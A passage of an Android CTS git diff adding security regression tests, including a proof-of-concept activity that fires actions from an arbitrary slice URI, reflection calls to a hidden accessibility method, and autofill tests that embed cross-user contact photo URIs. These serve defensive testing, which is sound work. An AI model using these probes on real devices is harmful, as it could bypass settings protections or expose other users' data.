+ wifiScanningToggle.wait(
+ Until.checked(
+ initialWifiScanGlobalSetting == 0 /* isChecked */),
+ waitMS)
+ || !wifiScanningToggle.isEnabled());
+
+ final int finalWifiScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(finalWifiScanGlobalSetting != -1);
+
+ assertFalse(
+ "Device is vulnerable to b/277333746 !!",
+ finalWifiScanGlobalSetting != initialWifiScanGlobalSetting);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
new file mode 100644
index 0000000..c322cb9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.app.slice.SliceItem.FORMAT_ACTION;
+import static android.app.slice.SliceItem.FORMAT_SLICE;
+
+import androidx.fragment.app.FragmentActivity;
+import androidx.lifecycle.LiveData;
+import androidx.slice.Slice;
+import androidx.slice.SliceItem;
+import androidx.slice.widget.SliceLiveData;
+
+public class PocActivity extends FragmentActivity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ LiveData sliceLiveData =
+ SliceLiveData.fromUri(this /* Context */, getIntent().getData());
+ sliceLiveData.observe(
+ this /* LifecycleOwner */,
+ slice -> {
+ if (slice != null) {
+ for (SliceItem outerItem : ((Slice) slice).getItems()) {
+ if (outerItem.getFormat().equals(FORMAT_SLICE)) {
+ for (SliceItem innerItem : outerItem.getSlice().getItems()) {
+ if (innerItem.getFormat().equals(FORMAT_ACTION)) {
+ try {
+ innerItem.fireAction(null, null);
+ } catch (Exception ignored) {
+ // Ignore all exceptions. Any exception here results
+ // in assumption failure in devicetest and prints
+ // appropriate logs
+ }
+ }
+ }
+ break;
+ }
+ }
+ }
+ });
+ } catch (Exception ignored) {
+ // Ignore all exceptions. Any exception here results in assumption failure in devicetest
+ // and prints appropriate logs
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
similarity index 69%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
index 4416990..98be098 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.TestLocationScanningServicesUsingSlices;
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
-public class PocActivity extends Activity {
-}
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {}
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
index dcbb59a..c9c3c04 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdalarmhelper"
android:label="Alarm related statsd CTS tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
index 2bd7e12..f5939fe 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdalarmhelper2"
android:label="Alarm related statsd CTS tests 2">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
index 72a57d8..a792332 100644
--- a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
@@ -141,5 +141,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsdatom"
android:label="CTS tests of android.os.statsdatom stats collection">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/ui/control/AndroidManifest.xml b/hostsidetests/ui/control/AndroidManifest.xml
index 4e2c60b..85f0ba8 100644
--- a/hostsidetests/ui/control/AndroidManifest.xml
+++ b/hostsidetests/ui/control/AndroidManifest.xml
@@ -27,5 +27,8 @@
<instrumentation
android:targetPackage="android.taskswitching.control.cts"
android:name="androidx.test.runner.AndroidJUnitRunner" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
index 2dfb579..37a5a1b 100644
--- a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
+++ b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
@@ -115,8 +115,10 @@
updateAlarmManagerConstants();
mActivityManagerDeviceConfigStateHelper
.set("bg_auto_restricted_bucket_on_bg_restricted", "false");
- SystemUtil.runWithShellPermissionIdentity(() ->
- DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT));
+ SystemUtil.runWithShellPermissionIdentity(() -> {
+ mInitialSyncDisabledMode = DeviceConfig.getSyncDisabledMode();
+ DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT);
+ });
AppOpsUtils.setOpMode(TEST_APP_PACKAGE, OPSTR_RUN_ANY_IN_BACKGROUND, MODE_IGNORED);
makeUidIdle();
setAppStandbyBucket("active");
diff --git a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
index ea3e2f7..f49f7e1 100644
--- a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
+++ b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
@@ -20,8 +20,8 @@
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
-import android.text.TextUtils;
import android.os.UserHandle;
+import android.text.TextUtils;
import android.util.Log;
import androidx.annotation.Nullable;
diff --git a/tests/acceleration/AndroidManifest.xml b/tests/acceleration/AndroidManifest.xml
index 59c1b64..e03f56f 100644
--- a/tests/acceleration/AndroidManifest.xml
+++ b/tests/acceleration/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.acceleration.cts"
android:label="Tests for the Hardware Acceleration APIs." >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/accessibility/AndroidManifest.xml b/tests/accessibility/AndroidManifest.xml
index 53304a2..1fe3cb6 100644
--- a/tests/accessibility/AndroidManifest.xml
+++ b/tests/accessibility/AndroidManifest.xml
@@ -108,6 +108,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.accessibility.cts"
android:label="Tests for the accessibility APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/accessibility/AndroidTest.xml b/tests/accessibility/AndroidTest.xml
index 50c7791..0ec90a0 100644
--- a/tests/accessibility/AndroidTest.xml
+++ b/tests/accessibility/AndroidTest.xml
@@ -24,6 +24,10 @@
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="run-command" value="cmd accessibility set-bind-instant-service-allowed true" />
<option name="teardown-command" value="cmd accessibility set-bind-instant-service-allowed false" />
+ <!-- Enable hidden APIs to allow tests to use reflection, for security tests which
+ check reflection abuse. This must be set before installing the test app. -->
+ <option name="run-command" value="settings put global hidden_api_policy 1" />
+ <option name="teardown-command" value="settings delete global hidden_api_policy" />
</target_preparer>
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
diff --git a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
index 6c21058..1c8f684 100644
--- a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
+++ b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
@@ -18,12 +18,17 @@
import static android.accessibility.cts.common.InstrumentedAccessibilityService.TIMEOUT_SERVICE_ENABLE;
+import static com.google.common.truth.Truth.assertThat;
+
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertSame;
+import static org.junit.Assert.assertThrows;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
+
+import android.Manifest;
import android.accessibility.cts.common.AccessibilityDumpOnFailureRule;
import android.accessibility.cts.common.InstrumentedAccessibilityService;
import android.accessibility.cts.common.InstrumentedAccessibilityServiceTestRule;
@@ -32,9 +37,12 @@
import android.app.Service;
import android.app.UiAutomation;
import android.content.Context;
+import android.content.pm.PackageManager;
import android.content.pm.ServiceInfo;
import android.os.Handler;
import android.platform.test.annotations.AsbSecurityTest;
+import android.view.InputEvent;
+import android.view.MotionEvent;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityManager;
import android.view.accessibility.AccessibilityManager.AccessibilityServicesStateChangeListener;
@@ -58,6 +66,9 @@
import org.junit.runner.RunWith;
import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
@@ -202,6 +213,32 @@
assertFalse(mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener));
}
+ @AsbSecurityTest(cveBugId = {309426390})
+ @Test
+ public void testInjectInputEventToInputFilter_throwsWithoutInjectEventsPermission()
+ throws Exception {
+ // Ensure the test itself doesn't have INJECT_EVENTS permission before
+ // calling the method that requires it and expecting failure.
+ assertThat(sInstrumentation.getContext().checkSelfPermission(
+ Manifest.permission.INJECT_EVENTS)).isEqualTo(PackageManager.PERMISSION_DENIED);
+
+ // Use reflection to directly invoke IAccessibilityManager#injectInputEventToInputFilter.
+ final AccessibilityManager accessibilityManager = (AccessibilityManager)
+ sInstrumentation.getContext().getSystemService(Service.ACCESSIBILITY_SERVICE);
+ final Field serviceField = AccessibilityManager.class.getDeclaredField("mService");
+ serviceField.setAccessible(true);
+ final Method injectInputEventToInputFilter =
+ Class.forName("android.view.accessibility.IAccessibilityManager")
+ .getDeclaredMethod("injectInputEventToInputFilter", InputEvent.class);
+
+ final InvocationTargetException exception = assertThrows(InvocationTargetException.class,
+ () -> injectInputEventToInputFilter.invoke(
+ serviceField.get(accessibilityManager),
+ MotionEvent.obtain(0, 0, 0, 0, 0, 0)));
+ assertThat(exception).hasCauseThat().isInstanceOf(SecurityException.class);
+ assertThat(exception).hasCauseThat().hasMessageThat().contains("INJECT_EVENTS");
+ }
+
@Test
public void testGetInstalledAccessibilityServicesList() throws Exception {
List<AccessibilityServiceInfo> installedServices =
diff --git a/tests/accessibilityservice/AndroidManifest.xml b/tests/accessibilityservice/AndroidManifest.xml
index d3033f6..550c8e7 100644
--- a/tests/accessibilityservice/AndroidManifest.xml
+++ b/tests/accessibilityservice/AndroidManifest.xml
@@ -308,6 +308,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accessibilityservice.cts"
android:label="Tests for the accessibility APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
index d4a5df6..2baf74e 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
@@ -21,12 +21,10 @@
import static android.accessibilityservice.cts.utils.GestureUtils.click;
import static android.accessibilityservice.cts.utils.GestureUtils.dispatchGesture;
import static android.accessibilityservice.cts.utils.GestureUtils.doubleTap;
-import static android.accessibilityservice.cts.utils.GestureUtils.interruptedSwipe;
import static android.accessibilityservice.cts.utils.GestureUtils.swipe;
import static android.view.MotionEvent.ACTION_DOWN;
import static android.view.MotionEvent.ACTION_HOVER_ENTER;
import static android.view.MotionEvent.ACTION_HOVER_EXIT;
-import static android.view.MotionEvent.ACTION_HOVER_MOVE;
import static android.view.MotionEvent.ACTION_MOVE;
import static android.view.MotionEvent.ACTION_POINTER_DOWN;
import static android.view.MotionEvent.ACTION_POINTER_UP;
@@ -240,40 +238,7 @@
mTouchListener.assertNonePropagated();
}
- /**
- * Test whether interrupting and continuing touch exploration generates a consistent motion
- * event stream.
- */
- @Test
- @AppModeFull
- public void testInterruptedSwipe_generatesConsistentEventStream() {
- if (!mHasTouchscreen || !mScreenBigEnough) return;
- assertBasicConsistency();
- mController.registerCallback(
- Executors.newSingleThreadExecutor(),
- new BaseCallback() {
- public void onMotionEvent(MotionEvent event) {
- if (event.getActionMasked() == ACTION_DOWN
- && mController.getState()
- != TouchInteractionController.STATE_TOUCH_EXPLORING) {
- mController.requestTouchExploration();
- }
- }
- });
- PointF startPoint = add(mTapLocation, -mSwipeDistance, 0);
- PointF endPoint = add(mTapLocation, mSwipeDistance, 0);
- dispatch(interruptedSwipe(startPoint, endPoint, mSwipeTimeMillis));
- mHoverListener.assertPropagated(ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
- // If the touch exploration request arrives to the framework too late, we might only see one
- // hover interaction that combines both swipes.
- // All we care about is that the stream is consistent.
- if (mHoverListener.peek() != null) {
- mHoverListener.assertPropagated(
- ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
- }
- }
-
-/** Test whether we can initiate a drag. */
+ /** Test whether we can initiate a drag. */
@Test
@AppModeFull
@FlakyTest
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
index 8d5e2e8..c0ce0d2 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
@@ -108,8 +108,4 @@
throw new RuntimeException(e);
}
}
-
- public MotionEvent peek() {
- return mEvents.peek();
- }
}
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
index 86fa5bc..32e2b8f0 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
@@ -106,22 +106,6 @@
return new StrokeDescription(path(from, to), 0, duration);
}
- /**
- * Simulates a touch exploration swipe that is interrupted partway through for a specified
- * amount of time, and then continued.
- */
- public static GestureDescription interruptedSwipe(PointF from, PointF to, long duration) {
- GestureDescription.Builder builder = new GestureDescription.Builder();
- long time = 0;
- PointF midpoint = new PointF((from.x + to.x) / 2.0f, (from.y + to.y) / 2.0f);
- StrokeDescription swipe1 = new StrokeDescription(path(from, midpoint), 0, duration / 2);
- builder.addStroke(swipe1);
- time += swipe1.getDuration() + STROKE_TIME_GAP_MS;
- StrokeDescription swipe2 = startingAt(time, swipe(midpoint, to, duration / 2));
- builder.addStroke(swipe2);
- return builder.build();
- }
-
public static StrokeDescription drag(StrokeDescription from, PointF to) {
return from.continueStroke(
path(lastPointOf(from), to),
diff --git a/tests/accessibilityservice/testsdk29/AndroidManifest.xml b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
index 096ab69..ad47ad7 100644
--- a/tests/accessibilityservice/testsdk29/AndroidManifest.xml
+++ b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
@@ -42,6 +42,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accessibilityservice.cts.testsdk29"
android:label="Tests for the accessibility Sdk 29 APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/admin/AndroidManifest.xml b/tests/admin/AndroidManifest.xml
index 4341b15..54adff3 100644
--- a/tests/admin/AndroidManifest.xml
+++ b/tests/admin/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.admin.app"
android:label="Tests for the admin APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/app/Android.bp b/tests/app/Android.bp
index 0652fab..c8f3dcb 100644
--- a/tests/app/Android.bp
+++ b/tests/app/Android.bp
@@ -103,7 +103,7 @@
"general-tests",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
manifest: "DownloadManagerApi28Test/AndroidManifest.xml",
test_config: "DownloadManagerApi28Test/AndroidTest.xml",
lint: {
@@ -139,7 +139,7 @@
"general-tests",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
manifest: "DownloadManagerInstallerTest/AndroidManifest.xml",
test_config: "DownloadManagerInstallerTest/AndroidTest.xml",
lint: {
diff --git a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
index d19df19..d384327 100644
--- a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
+++ b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
@@ -69,10 +69,10 @@
SearchSpec.GROUPING_TYPE_PER_NAMESPACE
| SearchSpec.GROUPING_TYPE_PER_PACKAGE,
/*limit=*/ 37)
- .addProjection("schemaTypes1", expectedPropertyPaths1)
- .addProjection("schemaTypes2", expectedPropertyPaths2)
- .setPropertyWeights("schemaTypes1", expectedPropertyWeights)
- .setPropertyWeightPaths("schemaTypes2", expectedPropertyWeightPaths)
+ .addProjection("schemaType1", expectedPropertyPaths1)
+ .addProjection("schemaType2", expectedPropertyPaths2)
+ .setPropertyWeights("schemaType1", expectedPropertyWeights)
+ .setPropertyWeightPaths("schemaType2", expectedPropertyWeightPaths)
.setNumericSearchEnabled(true)
.setVerbatimSearchEnabled(true)
.setListFilterQueryLanguageEnabled(true)
@@ -101,21 +101,21 @@
| SearchSpec.GROUPING_TYPE_PER_PACKAGE);
assertThat(searchSpec.getProjections())
.containsExactly(
- "schemaTypes1",
+ "schemaType1",
expectedPropertyPaths1,
- "schemaTypes2",
+ "schemaType2",
expectedPropertyPaths2);
assertThat(searchSpec.getResultGroupingLimit()).isEqualTo(37);
assertThat(searchSpec.getPropertyWeights().keySet())
- .containsExactly("schemaTypes1", "schemaTypes2");
- assertThat(searchSpec.getPropertyWeights().get("schemaTypes1"))
+ .containsExactly("schemaType1", "schemaType2");
+ assertThat(searchSpec.getPropertyWeights().get("schemaType1"))
.containsExactly("property1", 1.0, "property2", 2.0);
- assertThat(searchSpec.getPropertyWeights().get("schemaTypes2"))
+ assertThat(searchSpec.getPropertyWeights().get("schemaType2"))
.containsExactly("property1.nested", 1.0);
- assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes1"))
+ assertThat(searchSpec.getPropertyWeightPaths().get("schemaType1"))
.containsExactly(
new PropertyPath("property1"), 1.0, new PropertyPath("property2"), 2.0);
- assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes2"))
+ assertThat(searchSpec.getPropertyWeightPaths().get("schemaType2"))
.containsExactly(new PropertyPath("property1.nested"), 1.0);
assertThat(searchSpec.isNumericSearchEnabled()).isTrue();
assertThat(searchSpec.isVerbatimSearchEnabled()).isTrue();
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
index bab038c..0e43f33 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
@@ -36,6 +36,7 @@
import static com.google.common.truth.Truth.assertThat;
+import static org.junit.Assert.assertThrows;
import static org.junit.Assume.assumeTrue;
import android.autofillservice.cts.R;
@@ -50,13 +51,16 @@
import android.autofillservice.cts.testcore.IdMode;
import android.autofillservice.cts.testcore.InstrumentedAutoFillService.FillRequest;
import android.content.Intent;
+import android.graphics.drawable.Icon;
import android.platform.test.annotations.FlakyTest;
import android.util.Log;
import android.view.View;
+import android.widget.RemoteViews;
import androidx.test.uiautomator.UiObject2;
import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.RetryableException;
import org.junit.After;
import org.junit.Test;
@@ -977,6 +981,51 @@
assertThat(v.isCredential()).isFalse();
}
+ @Test
+ public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+ enableFillDialogFeature(sContext);
+ enableService();
+
+ RemoteViews header = createPresentation("Dialog Header");
+ RemoteViews dialogRv = createPresentation("Dialog Presentation");
+ // bad url, should not be displayed
+ header.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+ "content://1000@com.android.contacts/display_photo/1"));
+ dialogRv.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+ "content://1000@com.android.contacts/display_photo/1"));
+
+ // Set response with a dataset
+ final CannedFillResponse.Builder builder = new CannedFillResponse.Builder()
+ .addDataset(new CannedDataset.Builder()
+ .setField(ID_USERNAME, "dude")
+ .setField(ID_PASSWORD, "sweet")
+ .setPresentation(createPresentation("Dropdown Presentation"))
+ .setDialogPresentation(dialogRv)
+ .build())
+ .setDialogHeader(header)
+ .setDialogTriggerIds(ID_PASSWORD);
+ sReplier.addResponse(builder.build());
+
+ // Start activity and autofill
+ LoginActivity activity = startLoginActivity();
+ mUiBot.waitForIdleSync();
+
+ sReplier.getNextFillRequest();
+ mUiBot.waitForIdleSync();
+
+ // Click on password field to trigger fill dialog
+ mUiBot.selectByRelativeId(ID_PASSWORD);
+ mUiBot.waitForIdleSync();
+
+ // Asserts that the header is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.findFillDialogHeaderPicker());
+
+ // Asserts that the
+ assertThrows(RetryableException.class,
+ () -> mUiBot.findFillDialogDatasetPicker());
+ }
+
private FieldsNoPasswordActivity startNoPasswordActivity() throws Exception {
final Intent intent = new Intent(mContext, FieldsNoPasswordActivity.class)
.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
index 96ebd3f..15fc1ed 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
@@ -75,6 +75,8 @@
import static com.google.common.truth.Truth.assertThat;
import static com.google.common.truth.Truth.assertWithMessage;
+import static org.junit.Assert.assertThrows;
+
import android.app.PendingIntent;
import android.app.assist.AssistStructure.ViewNode;
import android.autofillservice.cts.R;
@@ -104,6 +106,7 @@
import android.content.IntentSender;
import android.graphics.Color;
import android.graphics.Rect;
+import android.graphics.drawable.Icon;
import android.os.Bundle;
import android.os.SystemClock;
import android.platform.test.annotations.AppModeFull;
@@ -1468,6 +1471,46 @@
mActivity.assertAutoFilled();
}
+ @Test
+ public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+ // Set service.
+ enableService();
+
+
+ RemoteViews firstRv = createPresentation("hello");
+ RemoteViews secondRv = createPresentation("world");
+
+ // bad url, should not be displayed
+ firstRv.setImageViewIcon(R.id.icon,
+ Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+ secondRv.setImageViewIcon(R.id.icon,
+ Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+
+ // Set expectations.
+ sReplier.addResponse(new CannedFillResponse.Builder()
+ .addDataset(new CannedDataset.Builder()
+ .setField(ID_USERNAME, "dude", firstRv)
+ .setField(ID_PASSWORD, "sweet", secondRv)
+ .build())
+ .setHeader(firstRv)
+ .setFooter(secondRv)
+ .build());
+
+ mActivity.expectAutoFill("dude", "sweet");
+
+ // Trigger auto-fill.
+ mActivity.onUsername(View::requestFocus);
+ sReplier.getNextFillRequest();
+
+ // Assert that the dataset is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.assertDatasets("The Dude"));
+
+ // Assert that header/footer is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.assertDatasetsWithBorders("hello", "world", "The Dude"));
+ }
+
/**
* Tests the scenario where the service uses custom remote views for different fields (username
* and password), but each dataset has a different number of fields.
diff --git a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
index fb7ac1c..e10c9c2 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
@@ -1477,11 +1477,11 @@
return waitForObject(FILL_DIALOG_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
- private UiObject2 findFillDialogDatasetPicker() throws Exception {
+ public UiObject2 findFillDialogDatasetPicker() throws Exception {
return waitForObject(FILL_DIALOG_DATASET_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
- private UiObject2 findFillDialogHeaderPicker() throws Exception {
+ public UiObject2 findFillDialogHeaderPicker() throws Exception {
return waitForObject(FILL_DIALOG_HEADER_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
diff --git a/tests/backup/AndroidManifest.xml b/tests/backup/AndroidManifest.xml
index cf8d2e0..71a0925 100644
--- a/tests/backup/AndroidManifest.xml
+++ b/tests/backup/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.backup.cts"
android:label="CTS tests of Android Backup/Restore">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/camera/AndroidManifest.xml b/tests/camera/AndroidManifest.xml
index 9e460ae..8fa1087 100644
--- a/tests/camera/AndroidManifest.xml
+++ b/tests/camera/AndroidManifest.xml
@@ -130,6 +130,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.camera.cts"
android:label="CTS tests of android camera">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
index 2545ad2..4fe8168 100644
--- a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
+++ b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
@@ -33,10 +33,13 @@
import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_DENY;
import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_GRANT;
